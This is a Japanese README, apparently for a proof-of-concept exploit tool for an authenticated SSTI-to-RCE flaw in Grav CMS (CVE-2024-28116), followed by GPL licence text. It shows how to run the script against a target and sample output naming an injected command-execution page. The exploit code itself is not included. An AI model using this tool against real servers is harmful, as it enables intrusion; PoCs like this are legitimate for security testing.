
Grav CMS (CVE-2024-28116) における認証済み SSTI+RCE を悪用する Proof of Concept スクリプト
Grav CMS (CVE-2024-28116) の認証されたSSTI+RCEを悪用するPoCスクリプトです。 脆弱なGrav CMSが動作しているサーバーに悪意のあるRCEページを作成します。
認証された脆弱性であるため、Grav CMSの編集者ユーザーの有効な認証情報(スクリプトにハードコード)を使用する必要があります。
以下にツールの使用例を示します:
# python3 graver.py -t <target_url> -p <target_port>
出力付きの簡単な例:
# python3 graver.py -t http://www.mygrav.local -p 8000
RCE payload injected, now visit the malicious page at 'http://www.mygrav.local:8000/hacked_r79b?do='

graver は Maurizio Siddu によって開発されました
著作権 (c) 2024 graver
このプログラムはフリーソフトウェアです。あなたは、フリーソフトウェア財団によって公開されたGNU General Public Licenseのバージョン3、または(あなたの選択により)それ以降のバージョンの条件の下で、再配布または変更することができます。
このプログラムは有用であることを期待して配布されていますが、いかなる保証も提供しません。商品性または特定目的への適合性の暗黙の保証も含みません。詳細はGNU General Public Licenseを参照してください。
あなたはこのプログラムと共にGNU General Public Licenseのコピーを受け取っているはずです。受け取っていない場合は、http://www.gnu.org/licenses/ をご覧ください。